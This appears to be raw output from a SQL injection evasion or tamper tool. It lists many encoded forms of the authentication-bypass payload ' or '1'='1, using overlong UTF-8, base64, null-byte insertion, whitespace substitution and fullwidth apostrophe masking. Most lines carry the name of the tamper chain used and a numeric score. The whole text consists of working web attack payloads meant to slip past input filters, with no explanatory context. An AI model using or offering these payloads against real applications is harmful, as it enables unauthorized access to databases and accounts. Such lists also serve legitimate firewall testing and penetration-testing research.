%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0aor%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0a%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%BF%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF
%C0%DE%C0%AF%C0%AAor%C0%AA%C0%DE%C0%AF1%C0%DE%C0%AF%C0%BF%C0%DE%C0%AF1
LyohKi9cLyohKi8lLyohMDAqLyUvKiEyNyovJS8qITBkKi8lLyohMGFvciovJS8qITBkKi8lLyohMGEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovXC8qISovJS8qITAwKi8lLyohMjcqLz0vKiEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovJS8qITAwKi8=
XCUvKiEwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAwKi8=
XCUwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAw
XCcgb3IgXCcxXCc9XCcx
\%EF%BC%87 or \%EF%BC%871\%EF%BC%87=\%EF%BC%871
['overlongutf8 space_to_tab space20d0a appendnullbyte apostrophenullencode ', -100, '%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0aor%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0a%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%BF%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF']
['overlongutf8 ', -100, '%C0%DE%C0%AF%C0%AAor%C0%AA%C0%DE%C0%AF1%C0%DE%C0%AF%C0%BF%C0%DE%C0%AF1']
['base64encode space_to_tab space20d0a appendnullbyte apostrophenullencode ', 0, 'LyohKi9cLyohKi8lLyohMDAqLyUvKiEyNyovJS8qITBkKi8lLyohMGFvciovJS8qITBkKi8lLyohMGEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovXC8qISovJS8qITAwKi8lLyohMjcqLz0vKiEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovJS8qITAwKi8=']
['base64encode space_to_tab space20d0a appendnullbyte apostrophenullencode ', 0, 'XCUvKiEwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAwKi8=']
['base64encode space20d0a appendnullbyte apostrophenullencode ', 0, 'XCUwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAw']
['base64encode ', 0, 'XCcgb3IgXCcxXCc9XCcx']
['apostrophemask ', 10, '\\%EF%BC%87 or \\%EF%BC%871\\%EF%BC%87=\\%EF%BC%871']
